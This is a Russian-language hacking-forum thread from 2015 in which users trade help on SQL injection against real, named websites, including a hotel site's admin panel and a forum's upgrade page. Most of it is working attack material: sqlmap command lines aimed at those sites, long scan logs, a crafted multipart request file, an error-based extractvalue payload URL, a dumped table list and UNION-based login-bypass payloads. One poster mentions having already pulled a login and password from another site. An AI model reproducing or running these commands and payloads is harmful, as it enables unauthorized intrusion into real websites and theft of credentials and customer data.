ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
23.06.2015, 15:25
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от reuvenmatbil
reuvenmatbil said:
↑
при запуске sqlmap с параметром --os-shell
выдает
[06:35:40] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
как дальше действовать чтоб получить доступ, какие команды существуют?
права на запись есть select '' into outfile '/[full_path]/x.php';
|
|
|
23.06.2015, 15:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
54593
Репутация:
0
|
|
Почему на другую версию движка запрос типа
Код:
Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
записает на идеинтичном запросе?
В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..
Код:
Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150622}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:24:53
[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"
|
|
|
|
23.06.2015, 16:05
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Muracha
Muracha said:
↑
Почему на другую версию движка запрос типа
Код:
Code:
"-u "www.bogema-hotel.ru/access_admin.php" --eta --random-agent --threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --current-db --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
записает на идеинтичном запросе?
В прошлый раз на прошлом сайте получилось выдернуть логин и пароль, а тут блок какой-то..
Код:
Code:
"
sqlmap.py -u "http://www.bogema-hotel.ru" --eta --random-agent
--threads=8 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=EBU --curr
ent-db --column --data="auth_login=1*&auth_pass=g00dPa%24%24w0rD&auth_typ=on"
_
___ ___| |_____ ___ ___ {1.0-dev-nongit-20150622}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 15:24:53
[15:24:53] [INFO] fetched random HTTP User-Agent header from file '
indows; U; Windows NT 6.1; zh-TW; rv:1.9.2.13) Gecko/20101203 AskTbPTV/3.9.1.140
19 Firefox/3.6.13'
custom injection marking character ('*') found in option '--data'. Do you want t
o process it? [Y/n/q] n
[15:24:56] [INFO] testing connection to the target URL
[15:24:56] [INFO] heuristics detected web page charset 'windows-1251'
[15:24:56] [INFO] testing if the target URL is stable. This can take a couple of
seconds
[15:24:57] [INFO] target URL is stable
[15:24:57] [INFO] testing if POST parameter 'auth_login' is dynamic
[15:24:57] [WARNING] POST parameter 'auth_login' does not appear dynamic
[15:24:58] [WARNING] heuristic (basic) test shows that POST parameter 'auth_logi
n' might not be injectable
[15:24:58] [INFO] testing for SQL injection on POST parameter 'auth_login'
[15:24:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:25:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Gen
eric comment)'
[15:26:02] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[15:26:34] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDE
R BY or GROUP BY clause'
[15:27:07] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (MAKE_SET)'
[15:27:38] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (ELT)'
[15:28:11] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER
BY or GROUP BY clause (bool*int)'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[15:28:43] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[15:28:44] [INFO] testing 'MySQL = 5.0 boolean-based blind - ORDER BY, GROUP BY
clause'
[15:28:49] [WARNING] reflective value(s) found and filtering out
[15:28:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY
clause (original value)'
[15:28:51] [INFO] testing 'MySQL = 5.0 boolean-based blind - Stacked queries'
[15:29:25] [INFO] testing 'MySQL = 5.0 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:06] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (EXTRACTVALUE)'
[15:30:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (UPDATEXML)'
[15:30:24] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause (BIGINT UNSIGNED)'
[15:30:34] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER B
Y or GROUP BY clause'
[15:30:43] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACT
VALUE)'
[15:30:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[15:30:52] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[15:30:53] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[15:30:53] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause'
[15:30:53] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(EXTRACTVALUE)'
[15:30:54] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause
(UPDATEXML)'
[15:30:54] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause
(BIGINT UNSIGNED)'
[15:30:54] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause'
[15:30:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 66 columns (custom)
'"
значит нужно подобрать вектор вручную и посмотреть, что не так
Код:
Code:
http://www.arbet.am/search.php?CategoryID=1|extractvalue(1,concat(0x3a,version()))
|
|
|
|
23.06.2015, 19:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от Muracha
Muracha said:
↑
Почему на другую версию движка запрос типа Потому что там запрос другой multipart
создаете файл request.txt в него код
Код:
Code:
POST /access_admin.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.bogema-hotel.ru
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
------Exploit_Code
Content-Disposition: form-data; name="authorize"
1
------Exploit_Code
Content-Disposition: form-data; name="login"
1*
------Exploit_Code
Content-Disposition: form-data; name="password"
g00dPa$$w0rD
------Exploit_Code--
дальше python.exe "путь_до\sql\sqlmap.py" -r "путь_до\sql\request.txt" --eta --random-agent --threads=10 --level=5 --union-cols=1-66 --dbms="MySQL" --technique=E --dbs
Database: ironlogix_bgmh
[24 tables]
+------------------------------+
| SS_aux |
| SS_brand |
| SS_categories |
| SS_category_product |
| SS_currency_types |
| SS_customers |
| SS_manager |
| SS_manager_dany |
| SS_news |
| SS_order_status |
| SS_ordered_carts |
| SS_orders |
| SS_pages |
| SS_payment |
| SS_payoption |
| SS_product_options |
| SS_product_options_values |
| SS_products |
| SS_products_opt_val_variants |
| SS_review |
| SS_share |
| SS_special_offers |
| SS_tags |
| SS_thumb |
+------------------------------+
|
|
|
|
24.06.2015, 13:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
54593
Репутация:
0
|
|
Есть форум http://forum.chindirchero.ru/
В поле обновления по адресу " http://forum.chindirchero.ru/upgrade/"
Если вбить \1\ и \1\ появляется ошибка:
Код:
Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
Ñîîáùåíèå ñåðâåðà: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\1\'' at line 1
Êîä îøèáêè: 1064
Âðåìÿ: Wednesday 24th o June 2015 12:04:17 PM
Можно ли с помощью sqlmap выдернуть данные?
При составлении запроса и корректировки у меня sqlmap ругался на следующее и писал 404
Может, я неправильно составил запрос?
Код:
Code:
indows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET
CLR 3.5.30729)'
Multipart-like data found in POST data. Do you want to process it? [Y/n/q] Y
[13:11:29] [INFO] testing connection to the target URL
[13:11:29] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and
make sure that everything is set up properly? [Y/n] Y
[13:11:30] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
Код:
Code:
POST /index.php HTTP/1.1
Content-Length: 586
Content-Type: multipart/form-data; boundary=----Exploit_Code
Cookie: PHPSESSID=e2fa5bb7d6518aa7b7f3a206febdcff0
Host: www.forum.chindirchero.ru/upgrade/index.php
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
------Exploit_Code
Content-Disposition: form-data; name="username"
\1\
------Exploit_Code
Content-Disposition: form-data; name="username"
\1\
------Exploit_Code
Content-Disposition: form-data; name="password"
g00dPa$$w0rD
------Exploit_Code--
|
|
|
|
24.06.2015, 14:07
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Ну давай рассмотрим запрос:
Код:
Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='\1\'
Ругается на незакрытую кавычку, так как обратный слэш экранирует кавычку, подставляемую по умолчанию.
Можно ли пропихнуть свой пэйлоад? Теоретически можно, если:
1) У тебя есть второй параметр в запросе, который мы можем контролировать. То есть первым параметром мы экранируем кавычку, превращая дальнейший запрос в строковое значение, а вторым параметром прокидываем свою нагрузку.
У тебя в запросе участвует только одна переменная, поэтому это - не наш случай.
Значит нужно пытаться дополнить запрос в рамках одной переменной.
Но для этого, нам надо закрыть первую кавычку.
2) Обязательным условием должно являться, чтобы кавычка не преобразовывалась, а проходила в чистом виде.
Проверяем:
123'\
Response
Код:
Code:
SELECT m.*, g.* FROM ibf_members m LEFT JOIN ibf_groups g ON (g.g_id=m.mgroup) WHERE LOWER(name)='123'\'
Как видим, кавычка энкодится. Тухлый вариант.
Самый максимум этой баги - узнать текущий префикс к таблицам. |
|
|
|
24.06.2015, 20:13
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Muracha
Muracha said:
↑
сайт
http://www.bogema-hotel.ru/access_admin.php
- с уязвимой админкой.
Вставляю в login "admin ' or '1' =1/*" Перебираю варианты - ' or '1' =1-- но результата не достигаю.
Спустя час решил написать сюда.
Почему так? Фильтрация или неверно заданный запрос? Хотя делал все по авторской статье. разобрался, в чем проблема.
Код:
Code:
SELECT manager, password from SS_manager
NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию.
|
|
|
|
25.06.2015, 10:09
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от yarbabin
yarbabin said:
↑
разобрался, в чем проблема.
Код:
Code:
SELECT manager, password from SS_manager
NULL. из-за того, что записей нет и не возможно залогиниться даже обойдя авторизацию. Да разве? Как сказал kingbeef, можно использовать error-based векторы. С помощью них можно увидеть записи воочию.
Обойти авторизацию подстановками вроде ' or 1=1 # не получается из-за того, что в запросе участвует только поле login. Соответствие паролей проверяет php скрипт. Варианты:
- Вывести записи и подставить их в форму.
- Если записей действительно нет, или в них присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль.
|
|
|
|
25.06.2015, 11:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
216062
Репутация:
231
|
|
Сообщение от XAMEHA
XAMEHA said:
↑
присутствуют непробиваемые хэши, подставить с помощью UNION свои и ввести в поле пароля соответствующий пароль. я правильно понял, что такое сработает только при наличии соответствующих прав?
|
|
|
|
25.06.2015, 13:24
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от grimnir
grimnir said:
↑
я правильно понял, что такое сработает только при наличии соответствующих прав? Нет, это сработает, если помимо авторизации админка взаимодействует с таблицей пользователей по минимуму. Пример запроса:
Код:
Code:
SELECT id, login, pass, priv FROM user WEHRE name = '*'
login = ' UNION SELECT 1, 'admin', md5('1234'), 1 #
pass = 1234
Проблема выше (Muracha'а) решается простым выводом данных.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
